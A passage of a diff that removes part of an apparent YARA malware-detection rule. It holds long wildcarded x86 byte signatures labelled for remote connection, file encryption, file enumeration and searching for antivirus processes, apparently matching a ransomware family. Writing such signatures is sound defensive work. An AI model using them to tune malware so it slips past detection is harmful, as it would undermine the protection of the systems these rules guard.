-            ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v2 = {
-            55 8B EC 83 EC ?? 53 56 8B D9 89 55 ?? 57 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45
-            ?? ?? ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8
-            FF D6 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15
-            ?? ?? ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F
-            7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
-            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF
-            15 ?? ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83
-            EC ?? 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 8B 75 ?? 8D 4D ?? 68 ?? ??
-            ?? ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55
-            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89
-            01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ??
-            FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ??
-            ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$crypt_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 51 33 C0 89 4C 24 ?? 40 8B DA 50 51 50
-            83 EC ?? 89 5C 24 ?? 50 51 50 51 50 51 50 51 50 83 EC ?? 50 51 50 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8B
-            F8 03 F3 8D 4E ?? 8D 0C CF C1 E1 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 04 B7 8D 04 C5
-            ?? ?? ?? ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 89 44 24 ?? 8D 0C F5 ?? ?? ?? ??
-            51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 0C DD ?? ?? ?? ?? 8B F8 51 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 8B D8 89 5C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF
-            75 ?? 8D 0C 36 8B 35 ?? ?? ?? ?? 89 4C 24 ?? FF D6 8B 4C 24 ?? 8D 04 09 89 44 24 ??
-            8D 44 24 ?? 50 53 68 ?? ?? ?? ?? 51 FF 74 24 ?? FF D6 53 8B 1D ?? ?? ?? ?? FF D3 57
-            8B F0 FF D3 83 C0 ?? 8D 4C 24 ?? 03 C6 50 E8 ?? ?? ?? ?? 57 FF D3 40 8D 4C 24 ?? 50
-            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 F6
-            89 44 24 ?? 8B CE 57 89 4C 24 ?? FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24
-            ?? 8A 0C 38 80 F9 ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 40 57 89 44 24 ?? FF
-            D3 8B 4C 24 ?? 8B 54 24 ?? 3B C8 72 ?? 8B 7C 24 ?? 57 FF D3 85 C0 74 ?? 8B 4C 24 ??
-            89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C
-            24 ?? 3B F0 72 ?? 8B 7C 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 8B 35 ?? ??
-            ?? ?? 57 FF D6 8D 4C 24 ?? 8D 3C 47 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF
-            D6 FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34
-            47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 57 FF D3 8B 74 24 ?? 8B 1D ?? ?? ?? ?? 56 FF D3 C1 E0 ?? 8D 4C 24 ??
-            83 C0 ?? 50 E8 ?? ?? ?? ?? 56 FF D3 8D 4C 24 ?? 8D 04 C5 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 56 89 44 24 ?? FF D3 8B 5C 24 ?? 8B F0 8B CB 8D 3C 36 8B D7 E8 ?? ?? ?? ?? 8D 44
-            24 ?? 8B CE 8B 74 24 ?? 50 56 68 ?? ?? ?? ?? 57 C1 E1 ?? 53 89 4C 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 FF D3 83 C0 ?? 8D 4C 24 ??
-            50 E8 ?? ?? ?? ?? 56 FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 89 44 24 ?? 33 F6 8B 44
-            24 ?? 8B FE 50 FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 ?? 8A 0C 07 80 F9
-            ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 50 47 FF D3 8B 54 24 ?? 3B F8 72 ?? 8B
-            7C 24 ?? 57 FF D3 50 FF 74 24 ?? 6A ?? 57 56 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ??
-            8D 54 24 ?? 89 74 24 ?? 8B CF E8 ?? ?? ?? ?? 59 85 C0 75 ?? 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 85 C9 74
-            ?? 8B 45 ?? 89 08 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 33 F6 46 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B
-            C6 5E 5B 8B E5 5D C3
-        }
-		$crypt_files_v2 = {
-            8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 ?? ?? ?? ?? 52
-            FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF 74 24 ??
-            FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C0 ?? 68 ?? ?? ??
-            ?? 03 F0 56 6A ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? FF D3 8B 54 24 ?? 40 85 D2 74 ?? 3B C6 73 ?? 8D 0C 02 89 44 24 ?? 89 4C
-            24 ?? 89 54 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 40 83 7C 24 ?? ?? 74 ?? 03
-            44 24 ?? 3B C6 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 F6 FF D3 85 C0 74 ?? 8B
-            7C 24 ?? EB ?? 8D 9B ?? ?? ?? ?? 8B 4C 24 ?? 8A 04 0E 3C ?? 74 ?? 3C ?? 74 ?? 88 07
-            47 51 46 FF D3 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C
-            24 ?? 90 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24
-            ?? 3B F0 72 ?? 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 56 FF 15 ?? ??
-            ?? ?? 8D 4C 24 ?? 8D 34 46 56 89 74 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 57 8B 3D ?? ?? ?? ?? FF D7 68 ?? ?? ?? ?? 6A ?? 56 FF D7 8B 74 24 ?? 68 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 FF D7 FF 74 24 ?? 8D 34 46 FF D3 50 56
-            6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? 68 ?? ?? ?? ??
-            56 FF 15 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 8D 34 46 FF D3 50 56 6A ?? 57 6A ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24
-            ?? 8B 35 ?? ?? ?? ?? FF D6 8B F8 6A ?? C1 E7 ?? 68 ?? ?? ?? ?? 83 C7 ?? 57 6A ?? FF
-            15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D6 8D 0C C5 ?? ?? ?? ?? 8B 44 24 ?? 85 C0
-            74 ?? 3B CF 73 ?? 8B F8 EB ?? 33 FF FF 74 24 ?? FF D6 8B 0D ?? ?? ?? ?? 89 44 24 ??
-            85 C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF D6 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 34 00
-            8B D6 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57
-            68 ?? ?? ?? ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 57 FF
-            D3 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D
-            48 ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33
-            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01
-            41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24
-            ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 51 8D 54 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 8B 44 24 ?? 50 FF D3 8B 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ??
-            6A ?? FF 74 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 8D 4C 24 ?? E8 ?? ??
-            ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
-            15 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 66 89 03 83 FE ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8B 5D ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
-            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 75
-            ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 01 03 59 11 53
-            ?? 59 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 75 ?? 8B 45 ?? 33
-            C9 66 89 08 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files_v2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF D6 8D 85 ?? ?? ?? ?? 50
-            57 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0B 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? 5F 5E 5B
-            8B E5 5D C3 8B 5D ?? EB ?? 8D A4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 F6 85 ?? ?? ?? ?? ?? 74 ?? 68
-            ?? ?? ?? ?? 57 FF D6 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? FF 75 ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 01 03 11 53 ?? 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 35 ??
-            ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A
-            ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
-            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
-            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
-            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
-            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C3
-        }
-		$search_antivirus_processes_v2 = {
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8B F0 6A ?? 89 74 24 ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? C7 03 ??
-            ?? ?? ?? 83 FE ?? 74 ?? 53 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4B ?? 33 F6 EB
-            ?? 8D A4 24 ?? ?? ?? ?? 90 51 FF 74 B4 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 73 ?? 50
-            6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 8B 3D ?? ??
-            ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 46 8D 4B ?? 83 FE ?? 72 ?? 8B 74 24 ?? 53 56 FF
-            15 ?? ?? ?? ?? 8D 4B ?? 85 C0 75 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ??
-            ?? ?? 56 FF D7 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files_v2_1 = {
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? F7 D8 1B C0 40 75 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 3C 46 89 7D ?? FF D3 8D 85 ?? ??
-            ?? ?? 50 56 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0F 83 F8 ?? 75 ?? B8 ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C3 8B 7D ?? EB ?? 8D 9B ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D3 F6 85 ?? ??
-            ?? ?? ?? 74 ?? 83 7D ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 89 45 ?? 8B 47 ?? 6A ?? 89 45 ?? FF 15 ?? ?? ?? ?? 56 8B D8 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 6A ??
-            53 FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 45 ?? 8B 4D ?? EB ?? 83 BD ?? ?? ??
-            ?? ?? 0F 57 C0 66 0F 13 45 ?? 72 ?? 51 FF 75 ?? 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 89 55
-            ?? EB ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF 15 ?? ?? ??
-            ?? 8B 45 ?? 8B 4D ?? 01 0F 11 47 ?? 8B 45 ?? 3B 47 ?? 77 ?? 72 ?? 8B 45 ?? 3B 07 73
-            ?? 8B 45 ?? FF 00 8B 1D ?? ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33
-            C0 5B 8B E5 5D C3
-        }
-		$crypt_files_v2_1 = {
-            FF 15 ?? ?? ?? ?? 33 D2 89 44 24 ?? 89 44 24 ?? 8D 0C B7 8D 0C CD ?? ?? ?? ?? 85 C0
-            74 ?? 3B CB 73 ?? 8D 3C 01 89 44 24 ?? 89 7C 24 ?? 8B D1 EB ?? 89 54 24 ?? 8B F8 8B
-            4D ?? 8D 34 CD ?? ?? ?? ?? 85 C0 74 ?? 8D 0C 32 89 4C 24 ?? 3B CB 73 ?? 8B 54 24 ??
-            8B CF 89 7C 24 ?? 03 FE 89 7C 24 ?? EB ?? 33 C9 89 4C 24 ?? 8B 74 24 ?? 85 C0 74 ??
-            8D 04 F5 ?? ?? ?? ?? 03 C2 3B C3 72 ?? 33 FF 89 7C 24 ?? 8B 1D ?? ?? ?? ?? 85 C9 0F
-            84 ?? ?? ?? ?? 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68
-            ?? ?? ?? ?? 52 FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ??
-            56 FF 74 24 ?? FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C6
-            ?? 03 C6 68 ?? ?? ?? ?? 50 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 C7
-            44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 74 24 ?? FF D3 40 85 F6 74 ?? 3B 44 24 ?? 73 ??
-            8D 0C 06 89 44 24 ?? 89 4C 24 ?? 89 74 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3
-            40 85 F6 74 ?? 03 44 24 ?? 3B 44 24 ?? 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33
-            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 8B 7C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
-            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6
-            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? EB ?? 8D 49 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
-            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 8B 1D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 56 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 3C 46 57 E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68
-            ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68
